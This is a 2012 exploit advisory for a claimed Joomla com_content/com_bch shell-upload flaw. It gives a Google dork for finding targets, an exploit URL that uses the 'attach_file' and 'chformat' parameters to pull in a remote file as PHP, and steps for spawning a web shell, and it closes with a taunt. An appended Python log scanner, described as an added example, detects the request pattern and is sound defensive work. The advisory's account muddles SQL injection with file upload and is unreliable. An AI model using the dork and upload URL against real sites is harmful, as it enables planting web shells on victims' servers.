Joomla Bch / Content Shell Upload

26 Dec 2012 | Reported by Agd_Scorp | Type: packetstorm | Source: packetstormsecurity.com

Joomla Bch / Content Shell Upload Vulnerability, Dec 24, 2012, 'cont' parameter SQL injection risk

Code
` [ Joomla com_content Shell Upload Vulnerability]  
  
[x] Author : Agd_Scorp  
[x] Home : www.turkguvenligi.info (former)  
[x] E-mail : [email protected]  
[x] Found : Mon, Dec 24, 2012  
[x] Tested : Windows 7, Ubuntu, Gentoo  
[x] Dork : inurl:"/index.php?option=com_bch"  
________________________________________________________________  
****************************************************************  
  
[x] The Conclusion  
The vulnerability resides at 'cont' parameter, which is often used for reconnecting the SQL database to the website in order to gain information that is being provided by the administrator, although, if a few parameters are added as an extension-act, files can be uploaded, and therefore, more risk shall occur.  
  
[x] Vuln Exploit Report:  
http://localhost/index.php?option=com_content&cont=sendfile?controller&attach_file=[FILE LINK]&chformat=php (or any other you want it to change into)  
  
[x] Uploading a Shell  
First, change your shell's format into .txt, then extract into that, when uploaded, and chformat parameter is added, it will automatically be changed into *.php, therefore, your shell is spawned.  
  
  
[x] Note:  
h4ck y0u...  
kill y0u...  
0wn y0u....  
  
- TURKGUVENLIGI -  
  
`
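
A defender-side check for the request pattern the advisory describes, as an added example that is not part of the original advisory: it scans web-server access logs for requests to `com_content` or `com_bch` that carry the `cont`, `attach_file` and `chformat` parameters. The combined log format, the executable-extension list, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Components named in the advisory (title and dork).
COMPONENTS = {"com_content", "com_bch"}
# Assumed list of extensions a web server may execute; tune per deployment.
EXEC_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Client IP, request URI and status from a combined-format access log entry.
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify(uri):
    """Return the reasons a request URI matches the advisory's parameter pattern."""
    q = parse_qs(urlsplit(uri).query, keep_blank_values=True)  # also percent-decodes
    if not COMPONENTS & {v.lower() for v in q.get("option", [])}:
        return []
    reasons = []
    if any(v.lower().startswith("sendfile") for v in q.get("cont", [])):
        reasons.append("cont=sendfile")
    if any(re.match(r"(?i)(https?|ftp)://", v) for v in q.get("attach_file", [])):
        reasons.append("remote attach_file")
    if any(v.lower().lstrip(".") in EXEC_EXT for v in q.get("chformat", [])):
        reasons.append("executable chformat")
    return reasons

def scan(lines):
    """Return (client_ip, status, reasons) for every log line worth triaging."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        reasons = classify(m.group(2)) if m else []
        if reasons:
            hits.append((m.group(1), m.group(3), reasons))
    return hits

# Constructed sample entries (documentation IP ranges, example.org host).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Dec/2012:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Dec/2012:10:00:09 +0000] "GET /index.php?option=com_bch&cont=sendfile?controller&attach_file=http%3A%2F%2Ffiles.example.org%2Fnotes.txt&chformat=php HTTP/1.1" 200 312',
    '192.0.2.10 - - [26/Dec/2012:10:01:00 +0000] "GET /index.php?option=com_search&chformat=php HTTP/1.1" 200 900',
    '192.0.2.44 - - [26/Dec/2012:10:02:30 +0000] "POST /index.php?option=com_content&chformat=PHTML HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with a 2xx status should be followed by a search of the web root for recently created files with an executable extension.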
